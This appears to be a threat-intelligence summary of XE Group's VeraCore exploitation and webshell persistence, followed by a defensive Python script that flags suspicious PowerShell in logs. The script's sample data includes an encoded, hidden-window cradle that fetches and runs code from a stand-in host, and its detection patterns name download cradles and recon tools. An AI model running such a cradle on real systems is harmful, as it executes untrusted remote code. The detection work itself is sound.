
From Credit Card Skimming to Exploiting Zero-Days

· Published 03/02/2025 20:13 · Modified 04/02/2025 07:21


Essential information

Tags
2025-02-03, CVE-2024-57968, CVE-2025-25181, aspxspy, information theft, meterpreter, persistent access, powershell, remote access trojan, sql injection, supply chain attack, webshell, zero-day
Related entities
4 vulnerabilities (CVE), 17 observables, 1 intrusion set (APT), 17 techniques (MITRE ATT&CK), 3 malware, 2 others

Description

XE Group, a cybercriminal organization active since 2013, has evolved from credit card skimming to exploiting vulnerabilities. The group initially focused on web vulnerabilities and supply chain attacks but has now shifted to targeted attacks on the manufacturing and distribution sectors. It has demonstrated increased sophistication by exploiting previously undocumented vulnerabilities in VeraCore software, including an SQL injection flaw (CVE-2025-25181) and an upload validation vulnerability (CVE-2024-57968). XE Group maintains long-term access to compromised systems, as evidenced by its reactivation of a webshell planted years earlier; for defenders this means that a cleanup which patches the entry vector but leaves dormant webshells on the web server does not end the intrusion. Its recent activities include exfiltrating config files, network reconnaissance, and deploying a remote access trojan using obfuscated PowerShell commands. The group's evolution highlights its adaptability and growing threat to supply chain security.
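The description above names three things a defender can look for on a web server: a webshell that has started executing commands again, reconnaissance commands, and an obfuscated PowerShell command line that stages a RAT. The script below is an added example, not code from this page, from Intezer, or from any XE Group tooling: it runs over a few constructed process-creation log lines (the `host=... parent=... image=... cmdline=...` key-value layout, the WEB01 hostname and the `example.invalid` URL are all invented for the example, not real telemetry or indicators), decodes the base64/UTF-16LE payload that PowerShell's `-EncodedCommand` switch carries, and flags the command lines that show a webshell-style parent process (`w3wp.exe`), reconnaissance tooling, or a download cradle inside the decoded text.

```python
import base64
import re
from dataclasses import dataclass
from typing import List, Optional

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -en, -enc, ...).
# The \b stops "-e" from matching the start of unrelated switches such as -ep.
ENC_SWITCH = re.compile(
    r"-(?:e|ec|en|enc|encoded|encodedcommand)\b\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE
)

# Indicator patterns applied to the raw log line plus the decoded command (if any).
INDICATORS = {
    "spawned_by_iis": re.compile(r"parent=w3wp\.exe", re.I),  # IIS worker spawning a shell: webshell pattern
    "invoke_expression": re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I),
    "download_cradle": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Start-BitsTransfer", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-nop\b|-noprofile\b", re.I),
    "bypass_policy": re.compile(r"-ep\s+bypass|-executionpolicy\s+bypass", re.I),
    "recon_command": re.compile(r"\b(?:ipconfig|whoami|systeminfo|nltest|netstat|arp|net\s+(?:view|user|group))\b", re.I),
}


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plain-text command hidden behind -EncodedCommand, or None if absent/invalid."""
    m = ENC_SWITCH.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        # -EncodedCommand is base64 over UTF-16LE. Decoding as UTF-8 is a common triage
        # mistake and yields NUL-interleaved text that defeats string matching.
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


@dataclass
class Finding:
    line_no: int
    decoded: Optional[str]
    indicators: List[str]


def analyze_log(lines: List[str]) -> List[Finding]:
    """Score each log line; a line is reported when at least one indicator fires."""
    findings = []
    for no, line in enumerate(lines, 1):
        decoded = decode_encoded_command(line)
        text = line if decoded is None else line + "\n" + decoded
        hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
        if decoded is not None:
            hits.insert(0, "encoded_command")
        if hits:
            findings.append(Finding(no, decoded, hits))
    return findings


# Constructed sample data. The staging command is an illustrative download cradle,
# not a command attributed to XE Group; example.invalid is a reserved, unresolvable domain.
STAGE_CMD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"
ENCODED = base64.b64encode(STAGE_CMD.encode("utf-16-le")).decode("ascii")

SAMPLE_LOG = [
    "2025-02-03T20:13:01Z host=WEB01 parent=w3wp.exe image=powershell.exe "
    "cmdline=powershell.exe -nop -w hidden -enc " + ENCODED,
    "2025-02-03T20:14:10Z host=WEB01 parent=explorer.exe image=powershell.exe "
    "cmdline=powershell.exe Get-ChildItem C:\\inetpub\\wwwroot",
    "2025-02-03T20:15:30Z host=WEB01 parent=w3wp.exe image=cmd.exe "
    "cmdline=cmd.exe /c ipconfig /all",
]

if __name__ == "__main__":
    for f in analyze_log(SAMPLE_LOG):
        print(f"line {f.line_no}: {', '.join(f.indicators)}")
        if f.decoded:
            print(f"  decoded: {f.decoded}")
```

The second sample line (an administrator listing the webroot from an interactive session) produces no finding, which is the point of scoring on context such as the parent process rather than on `powershell.exe` alone. Real Sysmon or EDR telemetry uses a different field layout, so the `parent=` and `cmdline=` patterns are the part to adapt when running this against production logs.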

External references